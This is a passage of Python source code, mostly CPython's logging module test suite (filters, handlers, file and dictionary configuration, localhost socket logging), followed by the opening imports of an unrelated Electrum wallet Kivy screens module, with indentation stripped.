logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warn(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
def apply_config(self, conf):
file = cStringIO.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEquals(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
class LogRecordStreamHandler(StreamRequestHandler):
"""Handler for a streaming logging request. It saves the log message in the
TCP server's 'log_output' attribute."""
TCP_LOG_END = "!!!END!!!"
def handle(self):
"""Handle multiple requests - each expected to be of 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally."""
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unpickle(chunk)
record = logging.makeLogRecord(obj)
self.handle_log_record(record)
def unpickle(self, data):
return cPickle.loads(data)
def handle_log_record(self, record):
# If the end-of-messages sentinel is seen, tell the server to
# terminate.
if self.TCP_LOG_END in record.msg:
self.server.abort = 1
return
self.server.log_output += record.msg + "\n"
class LogRecordSocketReceiver(ThreadingTCPServer):
"""A simple-minded TCP socket-based logging receiver suitable for test
purposes."""
allow_reuse_address = 1
log_output = ""
def __init__(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = False
self.timeout = 0.1
self.finished = threading.Event()
def serve_until_stopped(self):
while not self.abort:
rd, wr, ex = select.select([self.socket.fileno()], [], [],
self.timeout)
if rd:
self.handle_request()
# Notify the main thread that we're about to exit
self.finished.set()
# close the listen socket
self.server_close()
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.tcpserver = LogRecordSocketReceiver(port=0)
self.port = self.tcpserver.socket.getsockname()[1]
self.threads = [
threading.Thread(target=self.tcpserver.serve_until_stopped)]
for thread in self.threads:
thread.start()
self.sock_hdlr = logging.handlers.SocketHandler('localhost', self.port)
self.sock_hdlr.setFormatter(self.root_formatter)
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.tcpserver.abort = True
del self.tcpserver
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
for thread in self.threads:
thread.join(2.0)
finally:
BaseTest.tearDown(self)
def get_output(self):
"""Get the log output as received by the TCP server."""
# Signal the TCP receiver and wait for it to terminate.
self.root_logger.critical(LogRecordStreamHandler.TCP_LOG_END)
self.tcpserver.finished.wait(2.0)
return self.tcpserver.log_output
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
logger.debug("eggs")
self.assertEquals(self.get_output(), "spam\neggs\n")
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fn = tempfile.mktemp(".log")
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn)
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn)
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = u'\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = cStringIO.StringIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, '\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
try:
warnings.filterwarnings("always", category=UserWarning)
file = cStringIO.StringIO()
h = logging.StreamHandler(file)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = file.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
file = cStringIO.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
file, "Dummy line")
s = file.getvalue()
file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
finally:
logging.captureWarnings(False)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEquals(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEquals(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
#Nothing will be output since both handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config13)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text):
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
def test_listen_config_10_ok(self):
with captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertTrue(c1 is logging.getLogger('xyz'))
self.assertTrue(c2 is logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertTrue(c1 is logging.getLogger('abc.def'))
self.assertTrue(c2 is logging.getLogger('abc.def.ghi'))
self.assertTrue(c2 is c3)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, MemoryTest,
EncodingTest, WarningsTest, ConfigDictTest, ManagerTest,
ChildLoggerTest)
if __name__ == "__main__":
test_main()
|
screens.py
|
import asyncio
from weakref import ref
from decimal import Decimal
import re
import threading
import traceback, sys
from typing import TYPE_CHECKING, List, Optional
from kivy.app import App
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.compat import string_types
from kivy.properties import (ObjectProperty, DictProperty, NumericProperty,
ListProperty, StringProperty)
from kivy.uix.recycleview import RecycleView
from kivy.uix.label import Label
from kivy.uix.behaviors import ToggleButtonBehavior
from kivy.uix.image import Image
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.utils import platform
from kivy.logger import Logger
from electrum.util import profiler, parse_URI, format_time, InvalidPassword, NotEnoughFunds, Fiat
from electrum.util import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING
from electrum import bitcoin, constants
from electrum.transaction import Transaction, tx_from_any, PartialTransaction, PartialTxOutput
from electrum.util import (parse_URI, InvalidBitcoinURI, PR_PAID, PR_UNKNOWN, PR_EXPIRED,
PR_INFLIGHT, TxMinedInfo, get_request_status, pr_expiration_values,
maybe_extract_bolt11_invoice)
from electrum.plugin import run_hook
from electrum.wallet import InternalAddressCorruption
